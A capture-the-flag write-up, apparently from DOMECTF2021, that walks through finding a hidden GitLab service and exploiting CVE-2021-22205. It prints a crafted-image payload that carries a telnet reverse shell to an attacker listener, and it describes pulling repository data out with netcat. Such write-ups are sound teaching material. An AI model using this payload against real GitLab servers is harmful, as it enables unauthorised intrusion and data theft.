Rocket Write-up

By
Anees P K
Published on
20 Nov 2021
7 min read
DOMECTF2021

Story

During our periodic deep web scans, one of our analysts made an interesting discovery. He broke into an encrypted communication channel, which belonged to a group of underground genetic scientists who experimented on animals with dangerous gene mods.

The best part, one of the modified raccoons is on the run, and he has deployed a website too. Find the Raccoon before he does some real damage!

Solution

Upon clicking on the provided link, you will land on a static website or a basic auth credential form on a time basis as shown below. (Hmm…. It looks like Rocket is way too clever.)

rocket1
rocket1

Let us begin with a simple port scan!

rocket1

From the port scan, we can see 2 suspect open ports 1947 and 3306. Let us try to connect them.

rocket1
rocket1

It looks like there is something with the ports here. So let us try to find all open ports in the actual port range.

rocket1

Now, let us try connecting to port 2579 through the browser.

rocket1

Voila, we found Rocket hiding in port 2579. But the site seems to be broken.

Now, let us search for the public exploits regarding GitLab. Also, remember to keep in mind that since the page is broken and there are no authentication screens, the exploit could also be unauthenticated.

Upon searching, you might end up in CVE-2021-22205. This is an unauthenticated RCE in the GitLab version from 11.9 to 13.10.3, and all it needs is an endpoint of GitLab.

Sounds perfect, right! Let us try to gain a reverse shell. This vulnerability is exploited by uploading a maliciously crafted image into the GitLab endpoint.

Here, the payloads I used are:

        echo -e "QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs=" | base64 -d > rshell.webp
        
        echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet <ip_of_ncserver> 1270 0<$TF | sh 1>$TF' >> rshell.webp
        
        echo -n "fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg==" | base64 -d >> rshell.webp
   

And let us start a netcat server and execute the payload via curl as shown in the image given below.

rocket1
rocket1

We got a reverse shell here.

GitLab is a web-based git repository that provides free open or private repositories. From the GitLab documentation, we can derive that they kept the git repos in /var/opt/gitlab/git-data/repositories/@hashed.

rocket1

Now, let us try to access the git folders via reverse shell:

Upon accessing the directory, you may notice that the ownership and permissions have been altered as shown in the below image. (I think it is done intentionally by Rocket).

rocket1

Also, there is only a limited number of commands like ls, zip, etc. available for you to execute. And since he had disabled all other commands in the shell, we need to download the git folder from Rocket to your local machine to look for the sensitive data inside of it.

And, you may also notice that you don’t have write permission anywhere except the folder /temp. So let us try to archive the folder, write it to /temp, and download it from there.

rocket1

Now to download that into our local machine. And for that, let us craft another malicious image with the download command.

In the server, run the netcat with nc -lnvp <PORT> > git_data.zip and run the exploit.

rocket1
rocket1

And, we got it. Now let us extract and initialize git inside.

rocket1

Now, let us check out every commit to see what is hidden behind it

rocket1
rocket1

And we found the flag which was hidden inside one of the commits.

(Such a clever Raccoon, isn’t he?)


Written by
Anees P K
Anees P K
DevSecOps Engineer
Experience the Beagle Security platform
Unlock one full penetration test and all Advanced plan features free for 10 days